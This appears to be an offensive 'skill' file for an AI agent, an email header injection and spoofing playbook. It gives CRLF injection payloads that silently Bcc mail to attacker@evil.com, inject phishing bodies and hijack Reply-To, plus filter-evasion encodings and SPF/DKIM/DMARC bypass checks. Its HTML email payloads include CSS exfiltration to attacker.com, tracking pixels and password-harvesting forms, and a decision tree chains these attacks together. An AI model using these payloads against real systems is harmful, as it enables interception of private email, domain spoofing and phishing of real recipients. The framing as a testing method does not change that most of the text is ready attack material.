SKILL: Email Header Injection — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert email header injection and authentication bypass. Covers SMTP CRLF injection, SPF/DKIM/DMARC circumvention, display name spoofing, and mail client rendering abuse. Base models miss the nuance between header injection (technical) and email auth bypass (protocol-level) — this skill covers both attack surfaces.
0. RELATED ROUTING
- crlf-injection — general CRLF injection; email headers are a specific high-value sink
- ssrf-server-side-request-forgery — when SMTP server is reachable via SSRF (gopher://smtp)
- open-redirect — redirect in password-reset emails as phishing amplification
1. SMTP HEADER INJECTION FUNDAMENTALS
SMTP headers are separated by CRLF (\r\n). If user input is placed into email headers without sanitization, injecting %0d%0a (or \r\n) adds arbitrary headers.
Injection anatomy
Normal header construction:
To: user@example.com\r\n
Subject: Contact Form\r\n
From: noreply@target.com\r\n
Injected (via Subject field):
Subject: Hello%0d%0aBcc: attacker@evil.com\r\n
Result:
Subject: Hello\r\n
Bcc: attacker@evil.com\r\n
Encoding variants to try
| Encoding | Payload |
|---|---|
| URL-encoded | %0d%0a |
| Double URL-encoded | %250d%250a |
| Unicode | \u000d\u000a |
| Raw CRLF | \r\n (in raw request) |
| LF only | %0a (some SMTP servers accept LF without CR) |
| Null byte + CRLF | %00%0d%0a |
2. ATTACK SCENARIOS
2.1 BCC Injection — Silent Email Exfiltration
Input field: email / name / subject
Payload: victim@target.com%0d%0aBcc:attacker@evil.com
Effect: attacker receives a copy of every email sent through this form
2.2 CC Injection with Header Stacking
Payload in "From name" field:
John%0d%0aCc:attacker@evil.com%0d%0aBcc:spy@evil.com
Result headers:
From: John
Cc: attacker@evil.com
Bcc: spy@evil.com
... (original headers continue)
2.3 Body Injection — Full Email Content Control
A blank line (\r\n\r\n) separates headers from body in SMTP:
Payload in Subject:
Urgent%0d%0a%0d%0aPlease click: https://evil.com/phish%0d%0a.%0d%0a
Result:
Subject: Urgent
Please click: https://evil.com/phish
.
(Blank line terminates headers, everything after is body)
2.4 Reply-To Manipulation for Phishing
Payload in From name:
IT Support%0d%0aReply-To:attacker@evil.com
Victim sees "IT Support" as sender
Replies go to attacker@evil.com
2.5 Content-Type Injection for HTML Phishing
Payload:
test%0d%0aContent-Type: text/html%0d%0a%0d%0a<h1>Password Reset</h1><a href="https://evil.com">Click here</a>
Overrides Content-Type → renders HTML in email client
3. COMMON VULNERABLE PATTERNS
PHP mail()
$to = $_POST['email'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$headers = "From: noreply@target.com";
// ALL parameters are injectable:
mail($to, $subject, $message, $headers);
// $to injection: victim@x.com%0d%0aCc:attacker@evil.com
// $subject injection: Hello%0d%0aBcc:attacker@evil.com
// $headers injection: From: x%0d%0aBcc:attacker@evil.com
Python smtplib
msg = f"From: {user_from}\r\nTo: {user_to}\r\nSubject: {user_subject}\r\n\r\n{body}"
server.sendmail(from_addr, to_addr, msg)
# user_from / user_subject injectable if not sanitized
Node.js nodemailer
let mailOptions = {
from: req.body.from, // injectable
to: 'admin@target.com',
subject: req.body.subject, // injectable
text: req.body.message
};
transporter.sendMail(mailOptions);
4. SPF / DKIM / DMARC BYPASS TECHNIQUES
4.1 SPF (Sender Policy Framework) Bypass
SPF validates the MAIL FROM envelope sender IP against DNS TXT records.
| Technique | How |
|---|---|
| Subdomain delegation | Target has include:_spf.google.com; attacker uses Google Workspace to send as anything@mail.target.com |
| Include chain abuse | v=spf1 include:third-party.com — if third-party allows broad sending |
| DNS lookup limit (10) | SPF allows max 10 DNS lookups; chains exceeding this → permerror → some receivers accept |
+all misconfiguration | v=spf1 +all allows any IP (rare but exists) |
?all or ~all | Softfail/neutral → most receivers still deliver to inbox |
| No SPF record | Domain without SPF → anyone can send as that domain |
# Check SPF record:
dig TXT target.com +short
# Look for: v=spf1 ...
# Count DNS lookups (each include/a/mx/redirect = 1 lookup):
# >10 lookups = permerror = bypassed
4.2 DKIM (DomainKeys Identified Mail) Bypass
DKIM signs specific headers with a domain key. Bypass vectors:
| Technique | How |
|---|---|
d= vs From: mismatch | DKIM signs with d=subdomain.target.com but From: ceo@target.com — valid DKIM, spoofed From |
l= tag abuse | l= limits body length signed; attacker appends content after signed portion |
| Replay attack | Capture valid DKIM-signed email, resend with modified unsigned headers |
Missing h=from | If from header not in signed headers list (h=), From can be modified |
| Key rotation window | During DKIM key rotation, old selector may still validate |
# Check DKIM selector:
dig TXT selector._domainkey.target.com +short
# Common selectors: google, default, s1, s2, k1, dkim
4.3 DMARC (Domain-based Message Authentication) Bypass
DMARC requires SPF or DKIM to align with the From: header domain.
| Technique | How |
|---|---|
Relaxed alignment (aspf=r) | SPF passes for sub.target.com, DMARC accepts for target.com |
| Organizational domain | mail.target.com aligns with target.com in relaxed mode |
| No DMARC record | Domain without DMARC → no policy enforcement |
p=none | DMARC exists but policy is none → no enforcement, just reporting |
Subdomain policy (sp=none) | Main domain p=reject but sp=none → subdomains spoofable |
# Check DMARC:
dig TXT _dmarc.target.com +short
# Look for: v=DMARC1; p=none/quarantine/reject
4.4 Display Name Spoofing (Works Everywhere)
Even with perfect SPF/DKIM/DMARC, display name is not authenticated:
From: "admin@target.com" <attacker@evil.com>
From: "IT Security Team - target.com" <random@evil.com>
From: "noreply@target.com via Support" <attacker@evil.com>
Most email clients show only the display name in the inbox view. Mobile clients are especially vulnerable.
5. MAIL CLIENT RENDERING ATTACKS
CSS-based data exfiltration
<!-- In HTML email body -->
<style>
#secret[value^="a"] { background: url('https://attacker.com/leak?char=a'); }
#secret[value^="b"] { background: url('https://attacker.com/leak?char=b'); }
</style>
<input id="secret" value="TARGET_VALUE">
Remote image tracking
<img src="https://attacker.com/track?email=victim@target.com&t=TIMESTAMP" width="1" height="1">
<!-- Invisible pixel — confirms email was opened, leaks IP, client info -->
Form action hijacking
<!-- Some email clients render forms -->
<form action="https://attacker.com/phish" method="POST">
<input name="password" type="password" placeholder="Confirm your password">
<button type="submit">Verify</button>
</form>
6. CONTACT FORM / EMAIL API INJECTION
# REST API
POST /api/send-email {"to":"user@target.com\r\nBcc:attacker@evil.com","subject":"Hello","body":"Test"}
# URL-encoded form
name=John&email=victim%40target.com%0d%0aBcc%3aattacker%40evil.com&message=test
# GraphQL
mutation { sendEmail(to:"user@target.com\r\nBcc:attacker@evil.com" subject:"Test" body:"Hello") }
7. TESTING METHODOLOGY
1. Find email features: contact forms, password reset, invite/share, newsletters
2. Test CRLF: inject test%0d%0aX-Injected:true in each field → check received headers
3. Escalate: Bcc injection → body injection → Content-Type override
4. Parallel: dig TXT target.com (SPF) + dig TXT _dmarc.target.com (DMARC)
8. DECISION TREE
Found email-sending feature?
│
├── User input goes into email headers?
│ ├── YES → Test CRLF injection
│ │ ├── %0d%0a in Subject/From/To field
│ │ │ ├── Extra header appears → CONFIRMED
│ │ │ │ ├── Inject Bcc: → silent exfiltration
│ │ │ │ ├── Inject body (blank line) → content control
│ │ │ │ └── Inject Reply-To: → redirect replies
│ │ │ │
│ │ │ └── Filtered? → Try encoding variants
│ │ │ ├── %250d%250a (double encode)
│ │ │ ├── %0a only (LF without CR)
│ │ │ └── Unicode \u000d\u000a
│ │ │
│ │ └── All encodings blocked → check SPF/DKIM/DMARC
│ │
│ └── NO (user input only in body) → limited impact
│ └── Check for HTML injection in email body
│ └── If HTML rendered → phishing / CSS exfil
│
├── Want to spoof emails from target domain?
│ ├── Check SPF: dig TXT target.com
│ │ ├── No SPF / +all / ~all → direct spoofing possible
│ │ └── -all → SPF blocks; check DKIM/DMARC
│ │
│ ├── Check DMARC: dig TXT _dmarc.target.com
│ │ ├── No DMARC / p=none → spoofing delivered
│ │ ├── p=quarantine → lands in spam but delivered
│ │ └── p=reject → blocked; try subdomain (sp= policy)
│ │
│ └── All strict → Display name spoofing only
│ └── "admin@target.com" <attacker@evil.com>
│
└── Testing password reset email?
├── Check for token in URL → open redirect chain?
│ └── See ../open-redirect/SKILL.md
└── Check for host header injection → password reset poisoning
└── See ../http-host-header-attacks/SKILL.md
9. QUICK REFERENCE — KEY PAYLOADS
# BCC injection via Subject
Subject: Hello%0d%0aBcc:attacker@evil.com
# Body injection via From name
From: Test%0d%0a%0d%0aClick here: https://evil.com
# Reply-To hijack
From: Support%0d%0aReply-To:attacker@evil.com
# Full header stack injection
email=victim%40target.com%0d%0aCc%3aspy1%40evil.com%0d%0aBcc%3aspy2%40evil.com
# Display name spoof (no injection needed)
From: "security@target.com" <attacker@evil.com>